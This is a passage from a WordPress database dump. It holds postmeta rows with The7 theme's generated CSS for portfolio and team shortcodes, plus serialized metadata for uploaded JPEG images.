none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(24041,3549,'_wp_attached_file','2022/12/Untitled-e1673661268975.jpg'),
(24042,3549,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:173;s:6:\"height\";i:214;s:4:\"file\";s:35:\"2022/12/Untitled-e1673661268975.jpg\";s:8:\"filesize\";i:22824;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"Untitled-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2663;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"Untitled-1024x605.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:605;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15698;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"Untitled-e1673661268975-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5025;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"Untitled-768x454.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9729;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:20:\"Untitled-500x295.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:295;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5123;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:20:\"Untitled-800x473.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10269;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24043,3549,'_wp_attachment_backup_sizes','a:7:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1100;s:6:\"height\";i:650;s:4:\"file\";s:12:\"Untitled.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:20:\"Untitled-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1089;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:20:\"Untitled-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2663;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:20:\"Untitled-768x454.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9729;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:21:\"Untitled-1024x605.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:605;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15698;}s:11:\"awb_sm-orig\";a:5:{s:4:\"file\";s:20:\"Untitled-500x295.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:295;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5123;}s:11:\"awb_md-orig\";a:5:{s:4:\"file\";s:20:\"Untitled-800x473.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10269;}}'),
(24044,3551,'_wp_attached_file','2022/12/Untitled-1.jpg'),
(24045,3551,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:164;s:6:\"height\";i:211;s:4:\"file\";s:22:\"2022/12/Untitled-1.jpg\";s:8:\"filesize\";i:11071;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"Untitled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4946;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24046,3554,'the7_shortcodes_dynamic_css','a:1:{s:32:\"9630b021c095e0b5fd3fc53eab26dccd\";s:6838:\".dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media {\n  padding: 15px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media img {\n  max-width: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .dt-css-grid .team-media img {\n  width: 100px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";}'),
(24047,3554,'the7_shortcodes_dynamic_css','a:1:{s:32:\"9630b021c095e0b5fd3fc53eab26dccd\";s:6838:\".dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media {\n  padding: 15px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media img {\n  max-width: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .dt-css-grid .team-media img {\n  width: 100px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico {\n  margin-bottom: 